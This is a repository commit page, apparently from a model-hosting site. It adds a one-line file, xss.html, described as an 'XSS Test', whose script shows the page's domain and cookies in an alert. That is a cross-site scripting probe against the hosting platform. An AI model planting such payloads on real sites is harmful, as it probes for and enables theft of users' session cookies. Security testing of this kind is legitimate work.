osamaeid commited on
Commit
43b59fc
·
verified ·
1 Parent(s): 5c3848c

test HTML XSS

Browse files
Files changed (1) hide show
  1. xss.html +1 -0
xss.html ADDED
@@ -0,0 +1 @@
 
 
1
+ <html><body><script>alert(document.domain+"|"+document.cookie)</script><h1>XSS Test</h1></body></html>